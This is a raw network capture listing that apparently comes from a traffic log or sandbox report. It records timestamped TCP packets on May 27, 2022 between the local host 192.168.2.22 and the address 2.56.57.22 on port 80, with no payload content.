May 27, 2022 12:02:27.342267036 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342278957 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342288971 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342300892 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342304945 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342319012 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342329025 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342339993 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342351913 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342359066 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342402935 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342715025 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342741013 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342763901 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342766047 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342781067 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342787981 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342799902 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342811108 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342820883 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342835903 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342840910 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342860937 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342874050 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342885017 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342890978 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342911005 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342920065 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342935085 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342938900 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342959881 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342978001 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.342982054 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.342998028 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.343004942 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.343014956 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.343029976 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.343033075 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.343055010 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.343070030 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.343076944 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.343089104 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.343101025 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.343106985 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.343126059 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.343139887 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.343148947 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.343162060 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.343172073 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.343179941 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.343194008 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.343199968 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.343219995 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.343230009 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.343244076 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.343247890 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.343266964 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.343280077 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.343291998 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.343297958 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.343317986 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.343333960 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.343343019 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.343354940 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.343367100 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.343374968 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.343404055 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.355891943 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368354082 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368395090 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368418932 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368429899 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368442059 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368443012 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368469954 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368472099 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368494034 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368510008 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368515968 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368540049 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368567944 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368570089 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368583918 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368592978 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368599892 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368614912 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368638039 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368642092 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368648052 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368664980 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368673086 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368688107 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368701935 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368714094 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368716002 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368737936 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368743896 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368765116 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368792057 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368815899 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368839025 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368840933 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368845940 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368855000 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368860960 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368866920 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368885994 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368891001 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368908882 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368915081 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368932962 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368940115 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368957996 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368963957 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.368983030 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.368993998 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369013071 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369019032 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369051933 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369223118 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369272947 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369275093 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369297981 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369316101 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369321108 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369330883 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369345903 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369354963 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369370937 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369390965 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369394064 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369407892 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369417906 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369425058 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369441032 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369450092 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369467020 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369492054 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369497061 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369513988 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369517088 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369541883 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369544029 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369560003 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369565010 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369581938 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369596004 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369618893 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369643927 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369647026 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369647980 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369654894 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369671106 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369676113 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369694948 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369704008 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369719982 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369733095 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369744062 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369749069 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369770050 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369786024 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369792938 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369805098 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369816065 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369821072 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369841099 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369848967 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369864941 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369879007 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369889021 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369894028 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369914055 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369926929 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369937897 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369942904 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369961977 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369967937 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.369986057 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.369992971 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370009899 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370029926 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370033979 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370042086 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370058060 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370074987 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370080948 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370100021 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370105028 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370116949 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370127916 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370146036 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370151997 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370163918 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370174885 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370181084 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370198965 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370223999 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370229959 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370253086 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370254993 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370268106 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370277882 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370295048 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370301962 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370311975 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370326996 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370330095 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370351076 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370362997 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370374918 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370388031 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370398998 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370419025 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370423079 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370434999 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370449066 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370456934 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370472908 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370481968 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370496988 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370503902 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370522976 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370532036 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370546103 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370556116 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370569944 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370577097 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370594978 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370603085 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370620012 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370629072 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370647907 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370652914 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370672941 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370681047 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370696068 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370697975 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370723009 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370743990 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370747089 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370758057 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370769978 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370774984 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370795012 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370803118 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370829105 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370831966 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370857000 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370865107 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370882988 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370892048 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370907068 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370918989 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370932102 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370938063 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370955944 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370966911 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.370979071 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.370981932 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371004105 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371020079 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371026993 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371036053 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371052027 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371059895 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371077061 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371078968 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371100903 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371114016 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371125937 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371133089 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371150970 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371164083 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371174097 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371198893 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371198893 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371211052 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371222973 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371227980 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371248007 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371259928 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371273041 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371282101 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371295929 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371296883 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371323109 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371330023 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371347904 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371355057 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371371984 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371381998 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371397018 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371407986 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371421099 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371423960 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371447086 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371450901 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371473074 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371479034 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371496916 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371507883 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371520996 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371524096 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371545076 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371553898 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371567965 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371577024 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371592045 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371606112 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371615887 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371623039 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371643066 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371650934 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371668100 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371674061 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371692896 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371701956 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371717930 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371730089 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371742010 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371758938 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371763945 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371776104 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371788025 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371814966 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371839046 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371848106 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371870995 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371892929 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371895075 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371906996 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371920109 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371927023 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371944904 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371953011 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371968985 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.371989965 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.371993065 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372004032 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372018099 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372024059 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372041941 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372056961 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372066021 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372072935 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372092009 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372098923 CEST	49171	80	192.168.2.22	2.56.57.22
